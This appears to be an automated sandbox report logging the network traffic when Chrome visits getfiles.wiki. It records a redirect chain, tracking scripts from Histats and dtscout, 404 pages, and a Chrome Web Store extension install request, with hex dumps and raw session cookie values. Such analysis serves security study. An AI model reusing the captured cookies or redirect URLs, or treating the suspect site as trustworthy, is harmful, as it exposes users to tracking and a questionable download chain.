                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JbKFg1jpGSiWa2pVUqZMHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Accept-Ranges: none
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              2023-06-12 17:07:05 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                              Data Ascii: 11["gaia.l.a.r",[]]
                                                                                              2023-06-12 17:07:05 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              10192.168.2.349713149.56.240.132443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:10 UTC19OUTGET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1686622029954&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:199562055&@b3:1686622030&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&@w HTTP/1.1
                                                                                              Host: s4.histats.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://getfiles.wiki/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:10 UTC19INHTTP/1.1 200 OK
                                                                                              Date: Mon, 12 Jun 2023 17:07:13 GMT
                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                              Content-Length: 380
                                                                                              Connection: close
                                                                                              2023-06-12 17:07:10 UTC19INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 33 38 30 39 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73
                                                                                              Data Ascii: _HST_cntval="#3Vis. today=3809";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              11192.168.2.349714141.101.120.10443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:11 UTC20OUTGET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzc%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1
                                                                                              Host: e.dtscout.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://getfiles.wiki/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:11 UTC20INHTTP/1.1 200 OK
                                                                                              Date: Mon, 12 Jun 2023 17:07:11 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-S: mtl3
                                                                                              Set-Cookie: m=1; Domain=dtscout.com; Expires=Mon, 12-Jun-2023 18:30:31 GMT; Max-Age=5000; Path=/; SameSite=None; Secure
                                                                                              Set-Cookie: oa=1; Domain=dtscout.com; Expires=Mon, 12-Jun-2023 21:07:11 GMT; Max-Age=14400; Path=/; SameSite=None; Secure
                                                                                              Set-Cookie: df=1686589631; Domain=dtscout.com; Expires=Wed, 20-Sep-2023 17:07:11 GMT; Max-Age=8640000; Path=/; SameSite=None; Secure
                                                                                              X-T: 0.267
                                                                                              Expires: Mon, 12 Jun 2023 17:07:10 GMT
                                                                                              Cache-Control: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BAwKqadX4gjUsijDT5atpfclD10UkNoZWpjhYwYW0v%2BVOJfI0ExGdeE%2Btsr0DfowJBaJCLJuRR6Uy9ZdgxlnxHBOzDcQUbZ7k%2BykQVBQV1kGaWYGhU2Pfuubq1e4Vsc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 7d63b04a1c123616-FRA
                                                                                              2023-06-12 17:07:11 UTC21INData Raw: 38 31 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 65 78 65 63 29 7b 74 2e 65 78 65 63 3d 21 30 3b 76 61 72 20 72 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 2c 63 3d 6c 28 29 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 22 22 29 2c 65 3d 22 5f 64 74 73 70 76 22 2c 69 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 70 76 2f 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                                                                                              Data Ascii: 81f!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o||void 0!==(o=document.getElementsByT
                                                                                              2023-06-12 17:07:11 UTC22INData Raw: 22 3d 22 29 3b 72 65 74 75 72 6e 20 32 3d 3d 65 2e 6c 65 6e 67 74 68 3f 65 2e 70 6f 70 28 29 2e 73 70 6c 69 74 28 22 3b 22 29 2e 73 68 69 66 74 28 29 3a 6e 75 6c 6c 7d 2c 73 65 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 44 61 74 65 3b 6e 2e 73 65 74 54 69 6d 65 28 6e 2e 67 65 74 54 69 6d 65 28 29 2b 32 35 39 32 65 36 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 28 65 7c 7c 22 22 29 2b 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 2e 74 6f 55 54 43 53 74 72 69 6e 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 7d 3b 76 61 72 20 73 3d 21 31 2c 64 3d 6d 28 29 3b 6e 75 6c 6c 3d 3d 64 26 26 28 73 3d 21 30 2c 64 3d 7b 73 73 3a 70 28 31 30 29 2c 73 74 3a 63 2c 73 6c 3a 63 2c 75 31 3a 63 2c 75 33 3a 63
                                                                                              Data Ascii: "=");return 2==e.length?e.pop().split(";").shift():null},setItem:function(t,e){var n=new Date;n.setTime(n.getTime()+2592e6),document.cookie=t+"="+(e||"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c
                                                                                              2023-06-12 17:07:11 UTC23INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 69 66 28 22 66 6f 72 6d 64 61 74 61 22 3d 3d 28 65 3d 65 7c 7c 22 73 74 72 69 6e 67 22 29 29 7b 76 61 72 20 6e 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 61 70 70 65 6e 64 28 22 5f 22 2b 6f 2c 74 5b 6f 5d 29 7d 65 6c 73 65 7b 6e 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 70 75 73 68 28 22 5f 22 2b 6f 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 6f 5d 29 29 3b 6e 3d 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 7c 7c 6d 28 29 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 3d 7b 63 3a 7b 7d 7d 3a 22 63
                                                                                              Data Ascii: function g(t,e){if("formdata"==(e=e||"string")){var n=new FormData;for(var o in t)n.append("_"+o,t[o])}else{n=[];for(var o in t)n.push("_"+o+"="+encodeURIComponent(t[o]));n=n.join("&")}return n}function h(t,e){var n=e||m();for(var o in null==n?n={c:{}}:"c
                                                                                              2023-06-12 17:07:11 UTC23INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              12192.168.2.349715141.101.120.10443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:11 UTC23OUTGET /pv/?_a=v&_h=getfiles.wiki&_ss=ng6jfd0g1c&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=15t7&_cb=_dtspv.c HTTP/1.1
                                                                                              Host: t.dtscout.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://getfiles.wiki/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: m=1; oa=1; df=1686589631
                                                                                              2023-06-12 17:07:11 UTC24INHTTP/1.1 200 OK
                                                                                              Date: Mon, 12 Jun 2023 17:07:11 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-T: 0.122
                                                                                              X-C: 0
                                                                                              Expires: Mon, 12 Jun 2023 17:07:10 GMT
                                                                                              Cache-Control: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=daQuD51LkykHiIufOMt8eefLqS6FB0q2b5Nns4BY3s%2BkdBGcj7SYZV7ELL%2Fwbybosd0IEzoN%2BZm6izXfea2RLGMwxoJuxUo43zn3Ps44F0PX0C66OtJYpc3Qm64IZtI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 7d63b04cd9c65c3e-FRA
                                                                                              2023-06-12 17:07:11 UTC25INData Raw: 33 33 0d 0a 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 31 30 34 22 7d 2c 27 31 35 74 37 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a
                                                                                              Data Ascii: 33try{_dtspv.c({"b":"chrome@104"},'15t7');}catch(e){}
                                                                                              2023-06-12 17:07:11 UTC25INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              13192.168.2.349707188.114.97.7443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:11 UTC25OUTGET /favicon.ico HTTP/1.1
                                                                                              Host: getfiles.wiki
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: HstCfa4708787=1686622029954; HstCla4708787=1686622029954; HstCmu4708787=1686622029954; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
                                                                                              2023-06-12 17:07:12 UTC26INHTTP/1.1 404 Not Found
                                                                                              Date: Mon, 12 Jun 2023 17:07:12 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              vary: User-Agent
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              CF-Cache-Status: BYPASS
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 7d63b04e5dc068f2-FRA
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2023-06-12 17:07:12 UTC26INData Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                                                                                              Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                                                                                              2023-06-12 17:07:12 UTC27INData Raw: 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20
                                                                                              Data Ascii: on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                                                                              2023-06-12 17:07:12 UTC27INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              14192.168.2.34971635.190.80.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:12 UTC27OUTOPTIONS /report/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3 HTTP/1.1
                                                                                              Host: a.nel.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Origin: https://getfiles.wiki
                                                                                              Access-Control-Request-Method: POST
                                                                                              Access-Control-Request-Headers: content-type
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:12 UTC28INHTTP/1.1 200 OK
                                                                                              Content-Length: 0
                                                                                              access-control-max-age: 86400
                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-headers: content-type, content-length
                                                                                              date: Mon, 12 Jun 2023 17:07:12 GMT
                                                                                              Via: 1.1 google
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              15192.168.2.34971735.190.80.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:12 UTC28OUTPOST /report/v3?s=qDygGzpyVf%2FvXRZ8%2B8g7Doys1Hqvo9OGEGOztGaigdYFHOxl5%2BCHxGfDS%2FHsIBI%2FGtFnZCUdpiP6cmTWPUdk3BtIDngxQmeZkYkp%2B0JxsD05i5KWS9BqX9jj5M08v1L3 HTTP/1.1
                                                                                              Host: a.nel.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 461
                                                                                              Content-Type: application/reports+json
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:12 UTC29OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 4d 54 41 79 4c 6a 45 79 4f 53 34 78 4e 44 4d 75 4e 7a 63 3d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22
                                                                                              Data Ascii: [{"age":4,"body":{"elapsed_time":305,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzc=","sampling_fraction":1.0,"server_ip":"188.114.97.7","status_code":404,"type":"
                                                                                              2023-06-12 17:07:12 UTC29INHTTP/1.1 200 OK
                                                                                              Content-Length: 0
                                                                                              date: Mon, 12 Jun 2023 17:07:11 GMT
                                                                                              Via: 1.1 google
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.349700188.114.97.7443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:05 UTC1OUTGET /welcome.php HTTP/1.1
                                                                                              Host: getfiles.wiki
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-User: ?1
                                                                                              Sec-Fetch-Dest: document
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:05 UTC4INHTTP/1.1 302 Found
                                                                                              Date: Mon, 12 Jun 2023 17:07:05 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              location: https://exturl.com/r.php?key=pvwarw3
                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                              vary: User-Agent
                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NYJi5YdYRw%2FdhwUj9%2BETQRcFx0qP7sMv9S7PMjJpIsEk%2FEp0BQoWfCd5IyB9GjbtogUOrvjcNRVEein7WQTOdpXJIFpzReq9hfjLjV7jLgaUkJJ0FZxbUWikzuI3oZ1%2F"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 7d63b0264ff1bb74-FRA
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2023-06-12 17:07:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.349703142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-06-12 17:07:05 UTC5OUTGET /webstore/inlineinstall/detail/ecffbknobglofafinobbcmaionnihcma HTTP/1.1
                                                                                              Host: chrome.google.com
                                                                                              Connection: keep-alive
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2023-06-12 17:07:05 UTC6INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Mon, 12 Jun 2023 17:07:05 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-OUKiuXTGfIwuxOWZhMdFvQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';worker-src 'self';report-uri /webstore/cspreport
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/chromewebstore/2
                                                                                              Report-To: {"group":"coop_chromewebstore","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/chromewebstore"}]}
                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="coop_chromewebstore"
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Set-Cookie: NID=511=O-41PZOM4JAM3O6mR84aHb-HJ-jhkNo9A_SU_tcUFwraceM8b7md4ZwaxRCSxgUzeWp1LDTBoywCojdX06a53Hjy_wzxWMkPy7y7icAKwm1K6JVsR4TrPpFgmtoaBUQ_1Pn_zAV4OOERT7LeniKI1zSAXY-itFT79HH5kFMsDuc; expires=Tue, 12-Dec-2023 17:07:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Accept-Ranges: none
